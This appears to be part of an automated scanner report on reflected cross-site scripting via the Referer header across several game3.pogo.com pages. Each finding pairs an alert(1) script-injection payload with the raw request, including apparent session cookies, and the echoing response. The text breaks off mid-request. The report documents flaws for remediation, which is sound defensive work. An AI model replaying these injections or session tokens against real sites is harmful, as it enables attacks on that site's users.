Date: Sun, 09 Jan 2011 02:14:45 GMT
Server: Apache-Coyote/1.1
Content-Length: 23845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=42e11</script><script>alert(1)</script>27787d232a";
s.eVar2="pogo";
s.pageName="Arcade Home";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Arcade Home:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "un
...[SNIP]...

3.631. http://game3.pogo.com/error/java-problem.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/error/java-problem.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24687</script><script>alert(1)</script>491924de1e5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /error/java-problem.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=24687</script><script>alert(1)</script>491924de1e5

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:42 GMT
Server: Apache-Coyote/1.1
Content-Length: 6780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Game loading error
   </title>



...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=24687</script><script>alert(1)</script>491924de1e5";
s.eVar2="pogo";
s.pageName="ERROR: Game loading error Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Game loading error Page:Non Authenticated";
s.prop8="Non Authenticated
...[SNIP]...

3.632. http://game3.pogo.com/exhibit/game/game.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/exhibit/game/game.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd05</script><script>alert(1)</script>57005f1f7dd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /exhibit/game/game.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=dfd05</script><script>alert(1)</script>57005f1f7dd

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Content-Length: 3799
Date: Sun, 09 Jan 2011 02:15:33 GMT
Server: Apache-Coyote/1.1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>


...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=dfd05</script><script>alert(1)</script>57005f1f7dd";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(
...[SNIP]...

3.633. http://game3.pogo.com/exhibit/intermission.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/exhibit/intermission.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 563d3</script><script>alert(1)</script>491f0c3cf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /exhibit/intermission.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=563d3</script><script>alert(1)</script>491f0c3cf

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Content-Length: 3797
Date: Sun, 09 Jan 2011 02:15:37 GMT
Server: Apache-Coyote/1.1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>


...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=563d3</script><script>alert(1)</script>491f0c3cf";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(
...[SNIP]...

3.634. http://game3.pogo.com/exhibit/loading/loading.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/exhibit/loading/loading.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 162d4</script><script>alert(1)</script>71d830df306 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /exhibit/loading/loading.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=162d4</script><script>alert(1)</script>71d830df306

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Content-Length: 3799
Date: Sun, 09 Jan 2011 02:15:30 GMT
Server: Apache-Coyote/1.1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>


...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=162d4</script><script>alert(1)</script>71d830df306";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(
...[SNIP]...

3.635. http://game3.pogo.com/exhibit/loading/loading.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/exhibit/loading/loading.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 426d2</script><script>alert(1)</script>f5b0c4ef6b6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=426d2</script><script>alert(1)</script>f5b0c4ef6b6
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response

3.636. http://game3.pogo.com/room/game/autoplay-table.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/game/autoplay-table.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6dd7</script><script>alert(1)</script>d5e3f275c69 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /room/game/autoplay-table.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=a6dd7</script><script>alert(1)</script>d5e3f275c69

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:21 GMT
Server: Apache-Coyote/1.1
Content-Length: 35532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=a6dd7</script><script>alert(1)</script>d5e3f275c69";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.637. http://game3.pogo.com/room/game/chatshell.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/game/chatshell.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd068</script><script>alert(1)</script>2fcbd332d20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /room/game/chatshell.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=bd068</script><script>alert(1)</script>2fcbd332d20

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:17 GMT
Server: Apache-Coyote/1.1
Content-Length: 35487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=bd068</script><script>alert(1)</script>2fcbd332d20";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.638. http://game3.pogo.com/room/game/controlshell.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/game/controlshell.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2aeb8</script><script>alert(1)</script>0cac953bca4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /room/game/controlshell.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=2aeb8</script><script>alert(1)</script>0cac953bca4

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:20 GMT
Server: Apache-Coyote/1.1
Content-Length: 35514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=2aeb8</script><script>alert(1)</script>0cac953bca4";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.639. http://game3.pogo.com/room/game/dashshell.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/game/dashshell.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce6a2</script><script>alert(1)</script>79f70fb7d5a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /room/game/dashshell.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=ce6a2</script><script>alert(1)</script>79f70fb7d5a

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:15 GMT
Server: Apache-Coyote/1.1
Content-Length: 35487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=ce6a2</script><script>alert(1)</script>79f70fb7d5a";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.640. http://game3.pogo.com/room/game/frameset.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/game/frameset.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 804dd</script><script>alert(1)</script>f9fb6bee1c1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /room/game/frameset.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=804dd</script><script>alert(1)</script>f9fb6bee1c1

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:21 GMT
Server: Apache-Coyote/1.1
Content-Length: 35477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=804dd</script><script>alert(1)</script>f9fb6bee1c1";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.641. http://game3.pogo.com/room/game/game.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/game/game.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39631</script><script>alert(1)</script>d147f5bfa20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /room/game/game.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
